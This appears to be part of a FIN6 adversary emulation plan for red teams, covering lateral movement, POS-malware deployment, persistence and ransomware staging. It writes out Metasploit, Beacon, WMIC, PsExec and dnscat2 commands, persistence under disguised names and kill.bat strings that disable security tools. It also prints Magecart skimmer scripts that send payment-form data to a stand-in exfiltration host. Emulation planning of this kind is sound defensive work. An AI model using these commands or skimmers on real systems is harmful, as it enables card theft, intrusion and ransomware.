During Discovery, FIN6 identifies systems of interest. Depending on your organization’s use case, this could be a Point of Sale (POS) system, an E-commerce site, or hosts on which to emulate a ransomware event. FIN6 has deployed POS malware via popular penetration testing frameworks and executed these tools with the Windows Management Instrumentation (WMI) Command-Line Utility. FIN6 is reported to have compromised E-commerce environments by both injecting Magecart scripts into third-party JavaScript libraries and by directly attacking web servers. To deploy ransomware, the group copies its tools to an internal server, uses bat files for deployment, and WMI or PsExec for execution.
- You have accomplished the enabling objectives of Phase 1 (compromise, discover, and escalate), have identified your organizations use case (POS, E-commerce/web, ransomware), and are prepared to pursue Phase 2 objectives.
- Your objectives for Phase 2 are to deploy, execute, and persist an operational capability on a system of interest identified during Discovery.
- The operational capability should be deployed with the intent of assessing the likelihood of exfiltrating POS data, harvesting payment information from a web server, or deploying ransomware.
The lateral movement described herein describes lateral movement to systems of interest identified during Discovery. FIN6 has moved laterally using RDP and legitimate but compromised credentials to console into remote targets and access the system's command-line to run a PowerShell one-liner that stages either a Meterpreter payload or CobaltStrike's Beacon.4 The group has also made extensive use of these framework's lateral movement capabilities to expand access using built-in psexec commands.4 FIN6 uses lateral movement to establish a point of presence on systems of interest, prepare the environment, and deploy their operational capabilities.
The operational capability we will be emulating for this scenario is POS malware. You are encouraged to use a memory scraper of your choosing. We have opted to use mem_scraper. This PowerShell script continuously dumps a process's memory and subsequently scrapes it for track data. So as to remain operationally representative (name-wise), we used PS2EXE to compile the script into Assistant32.exe.5 7
Additional file names (T1036.005) used by FIN6 include:5
logmesvc.exe, ttfmgr.exe, powershell.exe, dspsvc.exe, logmeinlauncher.exe, and POSreport.exe, PnPXAssoc.exeAdditional service names (T1036.004) used by FIN6 in persisting POS malware:5
#{AV} Management Instrumentation, BFHlpr / Base Filtering Helper, hdmsv c/ Windows Hardware Management Driver, TrueType Fonts Management Service, and LogMeInServerMetasploit PsExec - PowerShell (T1059.001)
FIN6 Procedure
msf> use exploit/windows/smb/psexec
msf exploit(psexec) > set Target PowerShell
msf exploit(psexec) > set RHost #{POS system}
msf exploit(psexec) > set SMBDomain #{Domain}
msf exploit(psexec) > set SMBPass #{Password}
msf exploit(psexec) > set SMBUser #{User}
msf exploit(psexec) > exploitFIN6 Procedure
beacon> jump psexec_psh #{POS system}remote-exec wmi #{POS system}meterpreter>upload #{Assistant32.exe} C:\Windows\temp5.3 Executing the POS implant using WMIC (T1047)
FIN6 Procedure
wmic /node:#{"POS system"} process call create #{"executable"}Example: wmic /node:"192.168.101.1" process call create "c:\windows\temp\Assistant32.exe -Proc iexplore"Registry Run Keys (T1547.001)
FIN6 Procedure - DLL
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v #{ } /t REG_SZ /d #{ } "C:\#{ },#{ } /fExample: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Help Assistant" /t REG_SZ /d "rundll32.exe "C:\Windows\SysWOW64\0409\Assistant.dll",workerInstance" /fAlternative Procedure - EXE
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Help Assistant" /t REG_SZ /d "C:\Windows\temp\Assistant32.exe" /fScheduled Task (T1053.005)
FIN6 Procedure - DLL
"C:\Windows\System32\schtasks.exe" /create /tn #{ } /tr "rundll32.exe "C:\#{ }",#{ }" /sc #{ } /ru SystemExample: "C:\Windows\System32\schtasks.exe" /create /tn WindowsHelpAssistant /tr "rundll32.exe "C:\Windows\SysWOW64\0409\Assistant32.dll",workerInstance" /sc onstart /ru SystemAlternative Procedure - EXE
Example: "C:\Windows\System32\schtasks.exe" /create /tn WindowsHelpAssistant /tr "c:\windows\temp\Assistant32.exe" /sc onstart /ru SystemService Creation (T1543.003)
FIN6 Procedure
sc create "Windows Help Assistant" binpath="c:\windows\temp\Assistant32.exe" start="auto" obj="LocalSystem"Alternative Procedure
ruby dnscat2.rb --dns="domain=#{ }" --no cacheExample: ruby dnscat2.rb --dns="domain=example.com" --no cacheStart-Dnscat2 -Domain #{dnscat2 server} -Exec cmdFIN6 is suspected of being responsible for the Magecart Group 6 activity.10 Magecart Group 6 is responsible for targeting high-volume E-commerce sites and exfiltrating payment data to an infrastructure that mimics that of the victim. The group had a great deal of success in injecting Magecart scripts into legitimate 3rd party JavaScript libraries, thereby compromising the check-out process for thousands of E-commerce companies.10 FIN6 is also suspected of accomplishing enabling objectives in order to move laterally throughout an organization with the intent of gaining access to web servers.13 Once on a web server, the group modifies libraries to include custom Magecart scripts.
For organizations that are not in favor of injecting scripts into operational payment servers, we recommend the following. Assess your ability to move laterally within your network from a "compromised" host to the payment server. Assess your ability to gain unauthorized access and write to the server. Simulate exfiltration by manually issuing an HTTP POST with simulated credit card information to your exfiltration server.
FIN6 Procedure
msf> use exploit/windows/smb/psexec
msf exploit(psexec) > set Target PowerShell
msf exploit(psexec) > set RHost #{POS system}
msf exploit(psexec) > set SMBDomain #{Domain}
msf exploit(psexec) > set SMBPass #{Password}
msf exploit(psexec) > set SMBUser #{User}
msf exploit(psexec) > exploit -jFIN6 Procedure
beacon> jump psexec_psh #{Web Server}remote-exec wmi #{Web Server}FIN6 is suspected of compromising the web server responsible for hosting British Airways and modifying a JavaScript library to include the customized script detailed below.
British Airways14
window.onload = function() {
jquery("#submitButton").bind("mouse touchend", function(a){
var
n = {};
jQuery("#paymentForm").serializeArray().map(function(a){
n[a.name] = a.value
});
var e = document.getElementById("personPaying").innerHTML;
n.person = e;
var
t = JSON.stringify(n);
setTimeout(function(){
jQuery.ajax({
type: "POST",
async: !0,
url: #{"MaliciousExfilServer.com"},
data: t,
dataType: "application/json"
})
}, 500)
})
};FIN6 is suspected of operating in a similar manner against Newegg. The web server was compromised and the following script was integrated into the checkout process on the Newegg payment processing page.
Newegg15
window.onload = function(){
jQuery('#btnCreditCard.paymentBtn.creditcard').bind("mouseup touchend", function(e){
var dati = jQuery('#checkout');
var pdati = JSON.stringify(dati.serializeArray());
setTimeout(function() {
JQuery.ajax({
type: "POST",
async: true,
url: #{"MaliciousExfilServer.com"},
data: pdati,
dataType: 'application/json'
});
}, 250);
});
};For organizations interested in emulating FIN6’s use of ransomware, the group is believed to have compromised and configured internal servers as distribution nodes. Ransomware was hosted on these "deployment servers" with a BAT file (kill.bat) to disable security products and prepare hosts for compromise. Additional BAT files were used to distribute both the ransomware and kill.bat. These files were then executed by way of WMIC or PsExec.4 12
You are encouraged to use a ransomware simulator of your choosing. We have opted to use SimulateRansomware. This simple PowerShell script creates an "EncryptionTest" directory in My Documents PATH, creates 2 files, and writes random ASCII characters to simulate file open/close. So as to remain operationally representative (name-wise), we used PS2EXE to compile the script into sss.exe.12
7.1 Copy kill script (kill.bat/windows.bat), distribution script (xaa.bat, xab.bat, xac.bat, etc.), and ransomware (sss.exe) to the distribution server. (T1047) (T1059.003) 4 12
wmic /node:#{Ransomware recipient} /user:#{"domain\username"} /password:#{"password"} process call create "cmd.exe /c copy \\#{internal IP}\c$\windows\temp\sss.exe c:\windows\temp\"Kill.bat disables security products and alters firewall configs using binaries native to Windows. (T1562.001, T1562.004)
Strings from kill.bat:
net stop #{ }
sc config #{ } start=disabled
taskkill /IM #{ } /F
netsh #{ }FIN6 Procedure
copy sss.exe \\#{Distribution Server}\c$\windows\temp\FIN6 Procedure
copy xaa.bat \\#{Distribution Server}\c$\windows\temp\FIN6 Procedure
copy windows.bat \\#{Distribution Server}\c$\windows\temp\
copy kill.bat \\#{Distribution Server}\c$\windows\temp\FIN6 Procedure
wmic /node:#{internal_IP} /user:#{"domain\username"} /password:#{"password"} process call create "cmd.exe /c copy \\#{distribution_server}\c$\windows\temp\sss.exe c:\windows\temp\"FIN6 Procedure
wmic /node:#{internal_IP} /user:#{"domain\username"} /password:#{"password"} process call create "cmd.exe /c copy \\#{distribution_server}\c$\windows\temp\windows.bat or kill.bat c:\windows\temp\"7.3 Execute the kill script and then the ransomware.12
WMIC (T1047)
FIN6 Procedure
wmic /node:#{Ransomware recipient} /user:#{"domain\username"} /password:#{"password"} process call create "cmd /c c:\windows\temp\windows.bat" or "kill.bat"FIN6 Procedure
wmic /node:#{Ransomware recipient} /user:#{"domain\username"} /password:#{"password"} process call create "cmd /c c:\windows\temp\sss.exe"PsExec (T1569.002)
FIN6 has used the -r option to change the default remote service name in order to avoid detection. The group is believed to have named the remote services "mstdc" or "rtrsd."4 The command below authenticates over SMB, executes a command or binary, and returns the results locally.
FIN6 Procedure
psexec.exe \\#{internal IP} -u #{"domain\username"} -p #{"password"} -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat or kill.batFIN6 Procedure
psexec.exe \\#{internal IP} -u #{"domain\username"} -p #{"password"} -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe